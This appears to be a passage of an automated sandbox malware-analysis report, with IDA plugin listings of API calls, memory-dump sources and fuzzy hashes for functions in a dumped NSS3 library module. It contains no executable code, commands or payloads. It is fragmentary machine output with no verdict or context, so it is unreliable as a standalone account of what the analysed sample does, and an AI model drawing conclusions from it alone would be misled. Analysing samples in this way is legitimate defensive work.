                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C4CDE80
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3725328900-0
                                                                                                                                                                                                                                                      • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                      • Instruction ID: 4c979dc6d2b5743ad676ddee041ea5e964990721235e655728530f1808123b8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D731D6B5A41B429BE700CF56C890E52F7E4FFA5318B24822ED81C87B11E770F4A4CB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(6C495ADC,?,00000000,00000001,?,?,00000000,?,6C48BA55,?,?), ref: 6C4BFE4B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4BFE5F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(78831D74), ref: 6C4BFEC2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4BFED6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                      • Opcode ID: 8139b48b1f2fc905f96385cdd5b14ad866a0951d1c01acdd5acca26b74c533dd
                                                                                                                                                                                                                                                      • Instruction ID: eca3eb02c99a94bbb6204d35a1e1de17acbb75dc241f2a793b920156daec475d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8139b48b1f2fc905f96385cdd5b14ad866a0951d1c01acdd5acca26b74c533dd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C21E139A026259BE700EA28DC44FAAB3B4FF05359F450128ED0967F42E731B964CBE0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: TlsGetValue.KERNEL32 ref: 6C4C352E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: EnterCriticalSection.KERNEL32(?), ref: 6C4C3542
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PR_Unlock.NSS3(?), ref: 6C4C355B
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FA1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FBA
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FFE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3 ref: 6C4C401A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3021504977-0
                                                                                                                                                                                                                                                      • Opcode ID: 493220cfc02ca15205e787e755885febee032f4574e451a6b7e700347fa14eef
                                                                                                                                                                                                                                                      • Instruction ID: 6f825fac5de1b7182bc1fd0c7ae4d7a303302ef0a0fdc6bcad4874fd80e537d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 493220cfc02ca15205e787e755885febee032f4574e451a6b7e700347fa14eef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39314174604704CFD710EF69D584ABABBF0BF85355F01592DD8898BB10EB30E985CB96
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5003
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B501C
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B504B
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5064
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1112172411-0
                                                                                                                                                                                                                                                      • Opcode ID: 649b1c55063d5d591ecdb53fc65da74d71276e4bb65e5543d92fb2ee069cb280
                                                                                                                                                                                                                                                      • Instruction ID: 0e770dfa2f12cdbb82abe8eb44a789e3d1ae6e29b783663b52bea516ff2a5d51
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 649b1c55063d5d591ecdb53fc65da74d71276e4bb65e5543d92fb2ee069cb280
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC3129B4A05A06CFDB00EF68C484A6AFBF4FF09305B11852DD859AB700E730E990CBE5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,6C4DA71A,FFFFFFFF,?,?), ref: 6C4D9FAB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C4DA71A,6C4DA71A,00000000), ref: 6C4D9FD9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D136A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D137E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?), ref: 6C4D13CF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PR_Unlock.NSS3(?,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D145C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C4DA71A,6C4DA71A,00000000), ref: 6C4DA009
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,6C4DA71A,6C4DA71A,00000000), ref: 6C4DA045
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3535121653-0
                                                                                                                                                                                                                                                      • Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                                                      • Instruction ID: 8425838ad69e089eda853244e045d771052dcc8f8327902db9dde1aba6c1a556
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E2171B56012069BF700EF55DC60F66B7A9BF8536DF118128982987B81EB76F814CBD0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E2E08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6C4E2E1C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C4E2E3B
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4E2E95
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D1228
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C4D1238
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D124B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D125D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C4D126F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C4D1280
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C4D128E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C4D129A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4D12A1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B18A6
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C496C34,?,?,00000001,00000000,00000007,?), ref: 6C4B18B6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C496C34,?,?), ref: 6C4B18E1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B18F9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6C49ACC2
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C472F0A
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C472F1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C472AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C470A1B,00000000), ref: 6C472AF0
                                                                                                                                                                                                                                                        • Part of subcall function 6C472AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C472B11
                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6C49AD5E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C47B41E,00000000,00000000,?,00000000,?,6C47B41E,00000000,00000000,00000001,?), ref: 6C4B57E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C4B5843
                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(?), ref: 6C49AD36
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F50: CERT_DestroyCertificate.NSS3(?), ref: 6C472F65
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C472F83
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C49AD4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C3C9E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C3CAE
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C3CEA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3D02
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C4CF0AD,6C4CF150,?,6C4CF150,?,?,?), ref: 6C4CECBA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C4CECD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C4CED02
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C4CED5A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2957673229-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,?), ref: 6C49C890
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C49C8B2
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C49C8D0
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49C8EB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 999015661-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEDD4
                                                                                                                                                                                                                                                      • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEDFD
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEE14
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,6C4E9767,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEE33
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3903481028-0
                                                                                                                                                                                                                                                      • Opcode ID: 08490fb3241a13323802f16128c83edaddad641becc7d6c8acb52c09b3278623
                                                                                                                                                                                                                                                      • Instruction ID: d9da81c9dd2e83b0aee59866507e02eea407bfdb42520088129742e7d2e64fef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08490fb3241a13323802f16128c83edaddad641becc7d6c8acb52c09b3278623
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF11A3B1A04706ABEB10DE65ECC4F46B3A8EB8035EF204535E92987F01E331F46687E1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: TlsGetValue.KERNEL32 ref: 6C4906C2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: EnterCriticalSection.KERNEL32(?), ref: 6C4906D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: PR_Unlock.NSS3 ref: 6C4906EB
                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6C47DFBF
                                                                                                                                                                                                                                                      • CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C47DFDB
                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C47DFFA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47E029
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3183882470-0
                                                                                                                                                                                                                                                      • Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                                                      • Instruction ID: 319c20012f514cd7c23b4c5897563a13c38005994edc70fcdf8442d868a3d9cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D110C71A04265AFDB30DEB95C88FEF7678AB8035DF040638E91887B01E736D81596F1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
